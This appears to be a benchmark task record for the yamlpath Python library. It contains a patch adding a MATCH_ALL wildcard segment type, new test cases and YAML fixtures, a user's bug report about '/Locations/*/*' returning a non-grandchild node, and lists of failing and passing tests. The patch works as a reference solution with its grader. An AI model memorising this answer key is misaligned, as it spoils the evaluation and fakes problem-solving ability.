diff --git a/yamlpath/enums/pathsegmenttypes.py b/yamlpath/enums/pathsegmenttypes.py
index 489d9e0..4c9a402 100644
--- a/yamlpath/enums/pathsegmenttypes.py
+++ b/yamlpath/enums/pathsegmenttypes.py
@@ -36,6 +36,9 @@ class PathSegmentTypes(Enum):
Traverses the document tree deeply. If there is a next segment, it
must match or no data is matched. When there is no next segment, every
leaf node matches.
+
+ `MATCH_ALL`
+ Matches every immediate child node.
"""
ANCHOR = auto()
@@ -45,3 +48,4 @@ class PathSegmentTypes(Enum):
SEARCH = auto()
TRAVERSE = auto()
KEYWORD_SEARCH = auto()
+ MATCH_ALL = auto()
diff --git a/yamlpath/processor.py b/yamlpath/processor.py
index 7c97027..38e301c 100644
--- a/yamlpath/processor.py
+++ b/yamlpath/processor.py
@@ -839,6 +839,11 @@ class Processor:
node_coords = self._get_nodes_by_index(
data, yaml_path, segment_index,
translated_path=translated_path, ancestry=ancestry)
+ elif segment_type == PathSegmentTypes.MATCH_ALL:
+ node_coords = self._get_nodes_by_match_all(
+ data, yaml_path, segment_index, parent=parent,
+ parentref=parentref, translated_path=translated_path,
+ ancestry=ancestry)
elif segment_type == PathSegmentTypes.ANCHOR:
node_coords = self._get_nodes_by_anchor(
data, yaml_path, segment_index,
@@ -1894,6 +1899,244 @@ class Processor:
data=node_coord)
yield node_coord
+ def _get_nodes_by_match_all_unfiltered(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield every immediate, non-leaf child node.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all_unfiltered: "
+ parent: Any = kwargs.pop("parent", None)
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+ segments = yaml_path.escaped
+ pathseg: PathSegment = segments[segment_index]
+
+ self.logger.debug(
+ "Gathering ALL immediate children in the tree at parentref,"
+ f" {parentref}, in data:",
+ prefix=dbg_prefix, data=data)
+
+ if isinstance(data, (CommentedMap, dict)):
+ self.logger.debug(
+ "Iterating over all keys to find ANY matches in data:",
+ prefix=dbg_prefix, data=data)
+ for key, val in data.items():
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ key, translated_path.seperator))
+ next_ancestry = ancestry + [(data, key)]
+ self.logger.debug(
+ f"Yielding dict value at key, {key} from data:",
+ prefix=dbg_prefix, data={'VAL': val, 'OF_DATA': data})
+ yield NodeCoords(val, data, key, next_translated_path,
+ next_ancestry, pathseg)
+ return
+
+ if isinstance(data, (CommentedSeq, list)):
+ for idx, ele in enumerate(data):
+ next_translated_path = translated_path + f"[{idx}]"
+ next_ancestry = ancestry + [(data, idx)]
+ self.logger.debug(
+ f"Yielding list element at index, {idx}:",
+ prefix=dbg_prefix, data=ele)
+ yield NodeCoords(ele, data, idx, next_translated_path,
+ next_ancestry, pathseg)
+ return
+
+ if isinstance(data, (CommentedSet, set)):
+ for ele in data:
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ ele, translated_path.seperator))
+ self.logger.debug(
+ "Yielding set element:",
+ prefix=dbg_prefix, data=ele)
+ yield NodeCoords(
+ ele, parent, ele, next_translated_path, ancestry, pathseg)
+ return
+
+ self.logger.debug(
+ "NOT yielding Scalar node (* excludes scalars):",
+ prefix=dbg_prefix, data=data)
+ return
+
+ def _get_nodes_by_match_all_filtered(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield immediate child nodes whose children match additional filters.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all_filtered: "
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+ segments = yaml_path.escaped
+ pathseg: PathSegment = segments[segment_index]
+ next_segment_idx: int = segment_index + 1
+
+ self.logger.debug(
+ "FILTERING children in the tree at parentref,"
+ f" {parentref}, of data:",
+ prefix=dbg_prefix, data=data)
+
+ # There is a filter on this segment. Return nodes from the present
+ # data if-and-only-if any of their immediate children will match the
+ # filter. Do not return the child nodes; the caller will continue to
+ # process subsequent path segments to yield them.
+ if isinstance(data, dict):
+ self.logger.debug(
+ "Iterating over all keys to find ANY matches in data:",
+ prefix=dbg_prefix, data=data)
+ for key, val in data.items():
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ key, translated_path.seperator))
+ next_ancestry = ancestry + [(data, key)]
+ for filtered_nc in self._get_nodes_by_path_segment(
+ val, yaml_path, next_segment_idx, parent=data,
+ parentref=key, translated_path=next_translated_path,
+ ancestry=next_ancestry
+ ):
+ self.logger.debug(
+ "Ignoring yielded child node coordinate to yield its"
+ " successfully matched, filtered dict val parent for"
+ f" key, {key}:"
+ , prefix=dbg_prefix
+ , data={
+ 'VAL': val
+ , 'OF_DATA': data
+ , 'IGNORING': filtered_nc
+ })
+ yield NodeCoords(
+ val, data, key, next_translated_path, next_ancestry,
+ pathseg
+ )
+ break # because we need only the matching parent
+ return
+
+ if isinstance(data, list):
+ for idx, ele in enumerate(data):
+ self.logger.debug(
+ f"Recursing into INDEX '{idx}' at ref '{parentref}' for"
+ " next-segment matches...", prefix=dbg_prefix)
+ next_translated_path = translated_path + f"[{idx}]"
+ next_ancestry = ancestry + [(data, idx)]
+ for filtered_nc in self._get_nodes_by_path_segment(
+ ele, yaml_path, next_segment_idx, parent=data,
+ parentref=idx, translated_path=next_translated_path,
+ ancestry=next_ancestry
+ ):
+ self.logger.debug(
+ "Ignoring yielded child node coordinate to yield its"
+ " successfully matched, filtered list ele parent for"
+ f" idx, {idx}:"
+ , prefix=dbg_prefix
+ , data={
+ 'ELE': ele
+ , 'OF_DATA': data
+ , 'IGNORING': filtered_nc
+ })
+ yield NodeCoords(
+ ele, data, idx, next_translated_path, next_ancestry,
+ pathseg
+ )
+ break # because we need only the matching parent
+ return
+
+ def _get_nodes_by_match_all(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield every immediate child node.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all: "
+ parent: Any = kwargs.pop("parent", None)
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+
+ segments = yaml_path.escaped
+ next_segment_idx: int = segment_index + 1
+ filter_results = next_segment_idx < len(segments)
+
+ self.logger.debug(
+ "Processing either FILTERED or UNFILTERED nodes from data:"
+ , prefix=dbg_prefix, data=data)
+
+ if filter_results:
+ # Of data, yield every node which has children matching next seg
+ all_coords = self._get_nodes_by_match_all_filtered(
+ data, yaml_path, segment_index,
+ parent=parent, parentref=parentref,
+ translated_path=translated_path, ancestry=ancestry
+ )
+ else:
+ # Of data, yield every node
+ all_coords = self._get_nodes_by_match_all_unfiltered(
+ data, yaml_path, segment_index,
+ parent=parent, parentref=parentref,
+ translated_path=translated_path, ancestry=ancestry
+ )
+
+ for all_coord in all_coords:
+ self.logger.debug(
+ "Yielding matched child node of source data:"
+ , prefix=dbg_prefix, data={'NODE': all_coord, 'DATA': data})
+ yield all_coord
+
def _get_required_nodes(
self, data: Any, yaml_path: YAMLPath, depth: int = 0, **kwargs: Any
) -> Generator[NodeCoords, None, None]:
diff --git a/yamlpath/yamlpath.py b/yamlpath/yamlpath.py
index 759bafd..132e8e1 100644
--- a/yamlpath/yamlpath.py
+++ b/yamlpath/yamlpath.py
@@ -798,10 +798,9 @@ class YAMLPath:
segment_len = len(segment_id)
if splat_count == 1:
if segment_len == 1:
- # /*/ -> [.=~/.*/]
- coal_type = PathSegmentTypes.SEARCH
- coal_value = SearchTerms(
- False, PathSearchMethods.REGEX, ".", ".*")
+ # /*/ -> MATCH_ALL
+ coal_type = PathSegmentTypes.MATCH_ALL
+ coal_value = None
elif splat_pos == 0:
# /*text/ -> [.$text]
coal_type = PathSegmentTypes.SEARCH
@@ -877,6 +876,10 @@ class YAMLPath:
)
elif segment_type == PathSegmentTypes.INDEX:
ppath += "[{}]".format(segment_attrs)
+ elif segment_type == PathSegmentTypes.MATCH_ALL:
+ if add_sep:
+ ppath += pathsep
+ ppath += "*"
elif segment_type == PathSegmentTypes.ANCHOR:
if add_sep:
ppath += "[&{}]".format(segment_attrs)
@@ -886,17 +889,7 @@ class YAMLPath:
ppath += str(segment_attrs)
elif (segment_type == PathSegmentTypes.SEARCH
and isinstance(segment_attrs, SearchTerms)):
- terms: SearchTerms = segment_attrs
- if (terms.method == PathSearchMethods.REGEX
- and terms.attribute == "."
- and terms.term == ".*"
- and not terms.inverted
- ):
- if add_sep:
- ppath += pathsep
- ppath += "*"
- else:
- ppath += str(segment_attrs)
+ ppath += str(segment_attrs)
elif segment_type == PathSegmentTypes.COLLECTOR:
ppath += str(segment_attrs)
elif segment_type == PathSegmentTypes.TRAVERSE:
|
wwkimball/yamlpath
|
d2b693ca756638122697288ea25cc02310b00842
|
diff --git a/tests/test_processor.py b/tests/test_processor.py
index a205d18..34e6ebd 100644
--- a/tests/test_processor.py
+++ b/tests/test_processor.py
@@ -82,7 +82,11 @@ class Test_Processor():
("/array_of_hashes/**", [1, "one", 2, "two"], True, None),
("products_hash.*[dimensions.weight==4].(availability.start.date)+(availability.stop.date)", [[date(2020, 8, 1), date(2020, 9, 25)], [date(2020, 1, 1), date(2020, 1, 1)]], True, None),
("products_array[dimensions.weight==4].product", ["doohickey", "widget"], True, None),
- ("(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight", [10], True, None)
+ ("(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight", [10], True, None),
+ ("/Locations/*/*", ["ny", "bstn"], True, None),
+ ("/AoH_Locations/*/*/*", ["nyc", "bo"], True, None),
+ ("/Weird_AoH_Locations/*/*/*", ["nyc", "bstn"], True, None),
+ ("/Set_Locations/*/*", ["New York", "Boston"], True, None),
])
def test_get_nodes(self, quiet_logger, yamlpath, results, mustexist, default):
yamldata = """---
@@ -222,7 +226,35 @@ products_array:
height: 10
depth: 1
weight: 4
+
###############################################################################
+# For wildcard matching (#154)
+Locations:
+ United States:
+ New York: ny
+ Boston: bstn
+ Canada: cnd
+
+AoH_Locations:
+ - United States: us
+ New York:
+ New York City: nyc
+ Massachussets:
+ Boston: bo
+ - Canada: ca
+
+# Weird Array-of-Hashes
+Weird_AoH_Locations:
+ - United States:
+ New York: nyc
+ Boston: bstn
+ - Canada: cnd
+
+Set_Locations:
+ United States: !!set
+ ? New York
+ ? Boston
+ Canada:
"""
yaml = YAML()
processor = Processor(quiet_logger, yaml.load(yamldata))
|
Unexpected nodes returned for grandchild query /Locations/*/*
## Operating System
1. Name/Distribution: Windows 10 Home
2. Version: 10.0.19043 Build 19043
## Version of Python and packages in use at the time of the issue.
1. [Distribution](https://wiki.python.org/moin/PythonDistributions): CPython (for Windows) from python.org
2. Python Version: 3.7
3. Version of yamlpath installed: 3.6.3
4. Version of ruamel.yaml installed: 0.17.10
## Minimum sample of YAML (or compatible) data necessary to trigger the issue
```yaml
---
Locations:
United States:
New York:
Boston:
Canada:
```
## Complete steps to reproduce the issue when triggered via:
1. Command-Line Tools (yaml-get, yaml-set, or eyaml-rotate-keys): Precise command-line arguments which trigger the defect.
2. Libraries (yamlpath.*): Minimum amount of code necessary to trigger the defect.
#I thought that a complete unittest might be the most helpful way to demonstrate my issue. Please let me know if another format would be more helpful.
```python
import unittest
import yamlpath
from yamlpath.wrappers import ConsolePrinter
from yamlpath.common import Parsers
from yamlpath import Processor
from yamlpath.exceptions.yamlpathexception import YAMLPathException
from types import SimpleNamespace
class IssueReportTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_retrieveGrandChildren_OnlyGrandChildrenAreReturned(self):
yamlTagHierarchy = '''---
Locations:
United States:
New York:
Boston:
Canada:
'''
logging_args = SimpleNamespace(quiet=True, verbose=False, debug=False)
self._log = ConsolePrinter(logging_args)
self._editor = Parsers.get_yaml_editor()
(yaml_data, doc_loaded) = Parsers.get_yaml_data(self._editor, self._log, yamlTagHierarchy, literal=True)
self._processor = Processor(self._log, yaml_data)
nodes = list(self._processor.get_nodes("/Locations/*/*"))
self.assertEqual(nodes[0].parentref, "New York")
self.assertEqual(nodes[1].parentref, "Boston")
self.assertEqual(len(nodes), 2, f"Node '{nodes[2].parentref}' should not be part of this list, or?")
```
## Expected Outcome
When I try to select a specific level of descendant nodes using child and wildcard operators I expect to receive only nodes at the requested level. For example, in the above sample I expect "/Locations/*/*" to return "New York" and "Boston" (grandchildren of "Locations")
## Actual Outcome
If another branch of the yaml tree ends above the requested level, the query returns the last leaf on that branch. The above example returns "Canada" in addition to "New York" and "Boston", which is surprising to me as "Canada" is merely a child of "Location", while "New York" and "Boston" are grandchildren. I haven't been able to identify an easy way to distinguish the child from the grandchild nodes.
## Thank you
Thanks so much for considering this. I was thrilled to find yamlpath for a hobby project and really appreciate the library. I hope that I'm actually reporting a real issue rather than flaunting my ignorance of how the wildcard operator should work.
|
0.0
|
d2b693ca756638122697288ea25cc02310b00842
|
[
"tests/test_processor.py::Test_Processor::test_get_nodes[/Locations/*/*-results38-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/AoH_Locations/*/*/*-results39-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/Weird_AoH_Locations/*/*/*-results40-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/Set_Locations/*/*-results41-True-None]"
] |
[
"tests/test_processor.py::Test_Processor::test_get_none_data_nodes",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[&aliasAnchorOne]-results0-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[&newAlias]-results1-False-Not",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[0]-results2-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases.0-results3-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(array_of_hashes.name)+(rollback_hashes.on_condition.failure.name)-results4-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/array_of_hashes/name-results5-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[1:2]-results6-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[1:1]-results7-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[bravo:charlie]-results8-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/&arrayOfHashes/1/step-results9-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step=1].name-results10-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.!=][.=1.1]-results11-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.!=][.>1.1][.<3.3]-results12-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.^Hey]-results13-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.$Value]-results14-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[aliases[.%Value]-results15-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step>1].name-results16-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[&arrayOfHashes[step<2].name-results17-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.>charlie]-results18-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.>=charlie]-results19-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.<bravo]-results20-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.<=bravo]-results21-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[.=~/^\\\\w{6,}$/]-results22-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[squads[alpha=1.1]-results23-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+(/rollback_hashes/on_condition/failure/step)-(disabled_steps)-results24-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+((/rollback_hashes/on_condition/failure/step)-(disabled_steps))-results25-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(disabled_steps)+(&arrayOfHashes.step)-results26-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(&arrayOfHashes.step)+(disabled_steps)[1]-results27-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[((&arrayOfHashes.step)[1])[0]-results28-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[does.not.previously.exist[7]-results29-False-Huzzah!]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/number_keys/1-results30-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[**.[.^Hey]-results31-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/**/Hey*-results32-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[lots_of_names.**.name-results33-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[/array_of_hashes/**-results34-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[products_hash.*[dimensions.weight==4].(availability.start.date)+(availability.stop.date)-results35-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[products_array[dimensions.weight==4].product-results36-True-None]",
"tests/test_processor.py::Test_Processor::test_get_nodes[(products_hash.*.dimensions.weight)[max()][parent(2)].dimensions.weight-results37-True-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends-results0-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends.*bb-results1-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[A:S]-results2-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[2]-results3-Array",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends[&bl_anchor]-results4-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends([A:M])+([T:Z])-results5-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-baseball_legends([A:Z])-([S:Z])-results6-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[True-**-results7-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends-results8-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends.*bb-results9-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[A:S]-results10-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[2]-results11-Array",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends[&bl_anchor]-results12-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends([A:M])+([T:Z])-results13-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends([A:Z])-([S:Z])-results14-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-**-results15-None]",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends(rbi)+(errate)-results16-Cannot",
"tests/test_processor.py::Test_Processor::test_get_from_sets[False-baseball_legends.Ted\\\\",
"tests/test_processor.py::Test_Processor::test_change_values_in_sets[aliases[&bl_anchor]-REPLACEMENT-**.&bl_anchor-2]",
"tests/test_processor.py::Test_Processor::test_change_values_in_sets[baseball_legends.Sammy\\\\",
"tests/test_processor.py::Test_Processor::test_delete_from_sets[**[&bl_anchor]-old_deleted_nodes0-new_flat_data0]",
"tests/test_processor.py::Test_Processor::test_delete_from_sets[/baseball_legends/Ken\\\\",
"tests/test_processor.py::Test_Processor::test_enforce_pathsep",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[abc-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.>4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.<4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.>=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/ints/[.<=4F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.>4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.<4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.>=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[/floats/[.<=4.F]-True]",
"tests/test_processor.py::Test_Processor::test_get_impossible_nodes_error[abc.**-True]",
"tests/test_processor.py::Test_Processor::test_illegal_traversal_recursion",
"tests/test_processor.py::Test_Processor::test_set_value_in_empty_data",
"tests/test_processor.py::Test_Processor::test_set_value_in_none_data",
"tests/test_processor.py::Test_Processor::test_set_value[aliases[&testAnchor]-Updated",
"tests/test_processor.py::Test_Processor::test_set_value[yamlpath1-New",
"tests/test_processor.py::Test_Processor::test_set_value[/top_array/2-42-1-False-YAMLValueFormats.INT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/positive_float-0.009-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/negative_float--0.009-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/positive_float--2.71828-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/top_hash/negative_float-5283.4-1-True-YAMLValueFormats.FLOAT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[/null_value-No",
"tests/test_processor.py::Test_Processor::test_set_value[(top_array[0])+(top_hash.negative_float)+(/null_value)-REPLACEMENT-3-True-YAMLValueFormats.DEFAULT-/]",
"tests/test_processor.py::Test_Processor::test_set_value[(((top_array[0])+(top_hash.negative_float))+(/null_value))-REPLACEMENT-3-False-YAMLValueFormats.DEFAULT-/]",
"tests/test_processor.py::Test_Processor::test_cannot_set_nonexistent_required_node_error",
"tests/test_processor.py::Test_Processor::test_none_data_to_get_nodes_by_path_segment",
"tests/test_processor.py::Test_Processor::test_bad_segment_index_for_get_nodes_by_path_segment",
"tests/test_processor.py::Test_Processor::test_get_nodes_by_unknown_path_segment_error",
"tests/test_processor.py::Test_Processor::test_non_int_slice_error",
"tests/test_processor.py::Test_Processor::test_non_int_array_index_error",
"tests/test_processor.py::Test_Processor::test_nonexistant_path_search_method_error",
"tests/test_processor.py::Test_Processor::test_adjoined_collectors_error",
"tests/test_processor.py::Test_Processor::test_no_attrs_to_arrays_error",
"tests/test_processor.py::Test_Processor::test_no_index_to_hashes_error",
"tests/test_processor.py::Test_Processor::test_get_nodes_array_impossible_type_error",
"tests/test_processor.py::Test_Processor::test_no_attrs_to_scalars_errors",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/anchorKeys[&keyOne]-Set",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/hash[&keyTwo]-Confirm-1-True-YAMLValueFormats.DEFAULT-.]",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/anchorKeys[&recursiveAnchorKey]-Recurse",
"tests/test_processor.py::Test_Processor::test_key_anchor_changes[/hash[&recursiveAnchorKey]-Recurse",
"tests/test_processor.py::Test_Processor::test_key_anchor_children",
"tests/test_processor.py::Test_Processor::test_cannot_add_novel_alias_keys",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[number-5280-verifications0]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[aliases[&alias_number]-5280-verifications1]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[bool-False-verifications2]",
"tests/test_processor.py::Test_Processor::test_set_nonunique_values[aliases[&alias_bool]-False-verifications3]",
"tests/test_processor.py::Test_Processor::test_get_singular_collectors[(temps[.",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(/list1)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(/list2)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[((/list1)",
"tests/test_processor.py::Test_Processor::test_scalar_collectors[(((/list1)",
"tests/test_processor.py::Test_Processor::test_collector_math[(hash.*)-(array[1])-results0]",
"tests/test_processor.py::Test_Processor::test_collector_math[(hash)-(hoh.two.*)-results1]",
"tests/test_processor.py::Test_Processor::test_collector_math[(aoa)-(hoa.two)-results2]",
"tests/test_processor.py::Test_Processor::test_collector_math[(aoh)-(aoh[max(key1)])-results3]",
"tests/test_processor.py::Test_Processor::test_get_every_data_type",
"tests/test_processor.py::Test_Processor::test_delete_nodes[delete_yamlpath0-/-old_deleted_nodes0-new_flat_data0]",
"tests/test_processor.py::Test_Processor::test_delete_nodes[records[1]-.-old_deleted_nodes1-new_flat_data1]",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_delete",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_gather_and_alias",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_alias",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_gather_and_ymk",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_ymk",
"tests/test_processor.py::Test_Processor::test_null_docs_have_nothing_to_tag",
"tests/test_processor.py::Test_Processor::test_anchor_nodes[alias_path0-anchor_path0--/]",
"tests/test_processor.py::Test_Processor::test_anchor_nodes[a_hash.a_key-some_key--.]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[target-source--.-validations0]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[change_path1-ymk_path1--.-validations1]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[/target-/source--/-validations2]",
"tests/test_processor.py::Test_Processor::test_ymk_nodes[target-source-custom_name-.-validations3]",
"tests/test_processor.py::Test_Processor::test_tag_nodes[yaml_path0-!taggidy-/]",
"tests/test_processor.py::Test_Processor::test_tag_nodes[key-taggidy-.]",
"tests/test_processor.py::Test_Processor::test_rename_dict_key[yaml_path0-renamed_key-old_data0-new_data0]",
"tests/test_processor.py::Test_Processor::test_rename_dict_key_cannot_overwrite[yaml_path0-renamed_key-old_data0]",
"tests/test_processor.py::Test_Processor::test_traverse_with_null",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1.key12-results0]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1.&alias_name1.key12-results1]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_keys_access[reuse1[&alias_name1].key12-results2]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/list*[has_child(&anchored_value)][name()]-results0]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/list*[!has_child(&anchored_value)][name()]-results1]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_hash)][name()]-results2]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_hash)][name()]-results3]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_key)][name()]-results4]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_key)][name()]-results5]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[has_child(&anchored_value)][name()]-results6]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/hash*[!has_child(&anchored_value)][name()]-results7]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoh[has_child(&anchored_hash)]/intent-results8]",
"tests/test_processor.py::Test_Processor::test_yaml_merge_key_queries[/aoh[!has_child(&anchored_hash)]/intent-results9]",
